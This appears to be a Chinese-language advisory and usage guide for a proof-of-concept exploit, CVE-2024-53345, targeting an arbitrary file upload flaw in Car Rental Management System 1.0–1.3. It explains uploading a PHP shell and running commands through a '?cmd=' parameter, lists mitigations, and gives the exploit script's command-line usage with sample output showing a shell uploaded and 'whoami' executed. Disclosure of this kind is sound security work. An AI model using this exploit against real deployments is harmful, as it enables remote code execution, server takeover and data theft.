汽车租赁管理系统 1.0 - 1.3 版本中的严重 0 Day 漏洞
汽车租赁管理系统(版本 1.0 至 1.3)的系统设置模块文件上传功能中存在一个严重漏洞,允许低权限用户上传任意文件,包括可执行的 PHP 脚本。该漏洞源于文件类型验证不充分以及对上传目录的访问控制不当,使攻击者能够上传恶意文件,并无须身份验证即可公开访问这些文件。
通过利用此缺陷,攻击者可以上传 PHP shell,并随后在已上传文件的 URL 后附加 ?cmd= 来远程执行命令。这实现了远程代码执行(RCE),可能导致服务器被完全攻陷。利用该漏洞可能导致未授权访问敏感数据、权限提升,以及能够在网络内横向移动以发起进一步攻击。
默认配置:需要低权限用户账户才能访问系统设置模块中的上传功能。
特定站点配置:在某些部署中,文件上传功能可能被公开暴露,使攻击者无需用户账户即可利用此漏洞。
该漏洞属于严重级别,因为它允许远程代码执行,可能导致:
服务器被完全攻陷。 未授权数据访问。 权限提升。 网络内横向移动。
为缓解此漏洞:
实施严格的文件类型验证,以防止上传 .php 等可执行文件。 仅将文件上传权限授予受信任的用户。 确保上传文件存储在 Web 无法直接访问的目录中。 配置服务器权限,默认阻止执行已上传的文件。 定期修补和更新系统以修复已知漏洞。
python CVE-2024-53345.py -u "URL" -c "COOKIE" -cmd "COMMAND"
python3 CVE-2024-53345.py -u "URL" -c "COOKIE" -cmd "COMMAND"
-u 或 --url: 指定汽车租赁管理系统的基础 URL。
-c 或 --cookie: 提供低权限用户的 PHP 会话 ID(PHPSESSID)以验证上传请求。 示例:3952gmkk9uqf1csqgcmqo58qc0
-cmd 或 --command: 指定 shell 上传后在服务器上要执行的命令。 示例:hostname
[+] 正在尝试上传 shell...
[+] Shell 上传成功。请检查 /car_rental/admin/assets/uploads/ 目录。
[+] 找到已上传的 PHP 文件:['1730189880_php.php']
[+] 正在对已上传的 shell 执行命令 'whoami'...
[+] 命令输出:
Desktop-Demo\User